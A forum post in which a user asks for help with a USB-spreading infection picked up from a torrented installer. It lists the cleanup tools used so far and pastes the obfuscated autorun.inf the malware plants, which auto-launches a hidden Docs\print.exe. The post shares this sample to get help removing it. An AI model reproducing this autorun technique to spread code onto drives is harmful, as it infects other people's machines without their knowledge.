2 days ago, against better judgement, I installed a program. This program came from a torrent and checked out with an AVG scan. Living inside the packed installer was a little treat that you all can appreciate.
I knew what I was getting into the moment I saw svchost.exe appear in the install directory. I mean, obviously I knew I was being risky anyway, but I'm wasting your time.
What I have used so far.
MBAM SAS RootRepeal SDFix GooredFix smitfraudfix Hijackthis AVG SpybotS&D AdAware
I have removed versions of smitfraud and trojan.dropper.agent.nsg etc.
I have recently removed CLB rootkit.
I must give thanks to all the guides on bleepingcomputer for all your excellent help. My process list looks much smaller, my machine is running as it did, I am no longer being redirected from my google searches and MBAM reports a clean full scan.
Still, my machine is infecting USB drives upon insertion.
When inserted a folder and 3 files are being created.
The docs folder is hidden and has a recycle bin icon.
I would assume inserting this infected drive into another machine would be unpleasant.
The autorun.inf is locked from editing in a normal environment.
The contents of the autorun.inf are as follows:
[autorun ;OEP open=.\Docs\print.exe ;?? :cmp ;tg icon=%SystemRoot%\system32\SHELL32.dll,4 :jmp3 ;ü?g?ÝYwb??F?]L??CìF?mö?fò=?V÷ÍìTÿ action=Open folder to view files using Windows Explorer ;?dë???a?s???éü?Y??;`äw??X???L shell\\\\\\\open\\\\command=Docs////print.exe :jne1 ;?oÍjBv?è?|?? shell\\\explore\\\\\\\command=.\\\\Docs/print.exe ;ñ=T???L?AÑ???ÈxÖ ;;;;;;;;;;;;; useautoplay=1 ;à`Q?? ;(?s?? [autorun] :goto bleepavg
In this case "bleepavg" rhymes with duck
I have not been able to find any google results regarding this combination of "docs" "print.exe" "autorun.inf" and "goto bleepavg".
Thank you for reading.